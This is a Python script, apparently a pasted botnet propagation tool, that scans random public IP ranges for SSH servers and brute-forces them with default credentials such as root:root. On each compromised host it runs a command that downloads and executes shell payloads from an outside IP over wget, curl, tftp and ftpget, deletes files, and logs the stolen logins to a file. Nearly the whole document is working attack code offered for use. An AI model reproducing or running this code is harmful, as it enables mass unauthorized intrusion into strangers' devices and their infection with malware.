# peethon scanner kek# python scan.py 500 LUCKY 1 1# heck the internet ez pz

1. # peethon scanner kek
2. # python scan.py 500 LUCKY 1 1
3. # heck the internet ez pz
4. import threading, paramiko, random, socket, time, sys
5.  
6. paramiko.util.log_to_file("/dev/null")
7.  
8. server_ip = ""
9.  
10. blacklisted = ["127.0","10.0","192.168"]
11.  
12. passwords = ["admin:admin", "support:support", "root:root", "admin:1234", "user:user"]
13.  
14. if sys.argv[4] == "1":
15. passwords = ["support:support", "admin:admin", "root:root", "admin:1234", "user:user"]
16. if sys.argv[4] == "2":
17. passwords = ["admin:admin"]
18. if sys.argv[4] == "3":
19. passwords = ["root:root"]
20.  
21. if len(sys.argv) < 4:
22. sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
23.  
24. print """\n\x1b[0;37m*******************************************************************************
25. * \x1b[1;31m Matt's \x1b[1;35m 1337 \x1b[1;31m scanner \x1b[0;37m *
26. *******************************************************************************\x1b[0m"""
27. def sshscanner(ip):
28. global passwords
29. try:
30. thisipisbad='no'
31. for badip in blacklisted:
32. if badip in ip:
33. thisipisbad='yes'
34. if thisipisbad=='yes':
35. sys.exit()
36. username='root'
37. password="0"
38. port = 22
39. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
40. s.settimeout(3)
41. s.connect((ip, port))
42. data = str(s.recv(1024))
43. if "SSH" in data:
44. print("\x1b[1;34m SSH OPEN ON--> " + ip + "\x1b[37m")
45. elif "ssh" in data:
46. print("\x1b[1;34m SSH OPEN ON--> " + ip + "\x1b[37m")
47. else:
48. sys.exit()
49. s.close()
50. ssh = paramiko.SSHClient()
51. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
52. dobreak=False
53. for passwd in passwords:
54. if ":n/a" in passwd:
55. password=""
56. else:
57. password=passwd.split(":")[1]
58. if "n/a:" in passwd:
59. username=""
60. else:
61. username=passwd.split(":")[0]
62. try:
63. ssh.connect(ip, port = port, username=username, password=password, timeout=3)
64. break
65. except:
66. pass
67. badserver=True
68. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
69. output = stdout.read()
70. if "inet addr" in output:
71. badserver=False
72. websites = [ ]
73. if badserver == False:
74. print("\x1b[1;33mLoading " + ip + ": \x1b[1;34m[" + username + "] : [" + password + "]\x1b[36m")
75. ssh.exec_command('cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.145.169/bins.sh; curl -O http://80.211.145.169/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 80.211.145.169 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 80.211.145.169; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 80.211.145.169 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *')
76. vulns = open("vuln.txt", "a").write(username + ":" + password + ":" + ip + "\n")
77. time.sleep(12)
78. ssh.close()
79. except Exception as e:
80. pass
81.  
82.  
83. if sys.argv[2] == "LUCKY":
84. ranges = ["191.81.0.0/191.82.255.255", "186.33.0.0/186.33.255.255", "178.45.0.0/178.47.255.255", "31.162.0.0/31.163.255.255", "5.140.0.0/5.141.255.255", "90.150.0.0/90.151.255.255", "94.50.0.0/94.51.255.255", "37.76.0.0/37.76.255.255", "176.51.0.0/176.51.255.255", "2.60.0.0/2.60.255.255", "201.178.0.0/201.178.255.255", "181.22.0.0/181.22.255.255", "190.233.0.0/190.233.255.255", "118.173.0.0/118.173.255.255", "212.64.0.0/212.64.255.255", "95.188.0.0/95.188.255.255", "179.36.0.0/179.36.255.255"]
85. randomrange = random.choice(ranges)
86. startrng = randomrange.split("/")[0]
87. endrng = randomrange.split("/")[1]
88.  
89. if sys.argv[2] != "LUCKY":
90. a = int(sys.argv[2].split(".")[0])
91. b = int(sys.argv[2].split(".")[1])
92. c = int(sys.argv[2].split(".")[2])
93. d = int(sys.argv[2].split(".")[3])
94. else:
95. a = int(startrng.split(".")[0])
96. b = int(startrng.split(".")[1])
97. c = int(startrng.split(".")[2])
98. d = int(startrng.split(".")[3])
99. x = 0
100.  
101. while(True):
102. try:
103.  
104. if sys.argv[2] != "LUCKY":
105. endaddr = sys.argv[3]
106. else:
107. endaddr = endrng
108.  
109. d += 1
110.  
111. ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
112.  
113. if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
114. if sys.argv[2] == "LUCKY":
115. randomrange = random.choice(ranges)
116. startrng = randomrange.split("/")[0]
117. endrng = randomrange.split("/")[1]
118. a = int(startrng.split(".")[0])
119. b = int(startrng.split(".")[1])
120. c = int(startrng.split(".")[2])
121. d = int(startrng.split(".")[3])
122. else:
123. break
124.  
125. if d > 255:
126. c += 1
127. d = 0
128.  
129. if c > 255:
130. b += 1
131. c = 0
132.  
133. if b > 255:
134. a += 1
135. b = 0
136.  
137. ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
138.  
139. if ipaddr == endaddr:
140. if sys.argv[2] == "LUCKY":
141. randomrange = random.choice(ranges)
142. startrng = randomrange.split("/")[0]
143. endrng = randomrange.split("/")[1]
144. a = int(startrng.split(".")[0])
145. b = int(startrng.split(".")[1])
146. c = int(startrng.split(".")[2])
147. d = int(startrng.split(".")[3])
148. else:
149. break
150.  
151. if x > 500:
152. time.sleep(1)
153. x = 0
154.  
155. t = threading.Thread(target=sshscanner, args=(ipaddr,))
156. t.start()
157.  
158. except Exception as e:
159. pass
160.  
161. print "\x1b[37mDone\x1b[37m"